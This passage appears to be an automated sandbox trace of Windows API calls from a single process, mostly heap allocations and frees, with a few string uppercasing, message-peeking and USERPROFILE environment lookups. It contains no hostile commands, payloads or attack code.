lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0149.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0149.916] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.916] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a58 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0149.916] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0149.917] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a48 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0149.918] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.918] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0149.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0149.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0149.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0149.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0149.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0149.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0149.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0149.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0149.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0149.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0149.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.924] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0149.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0149.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0149.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0149.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0149.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.927] HeapFree (in: hHeap=0x2af0000, 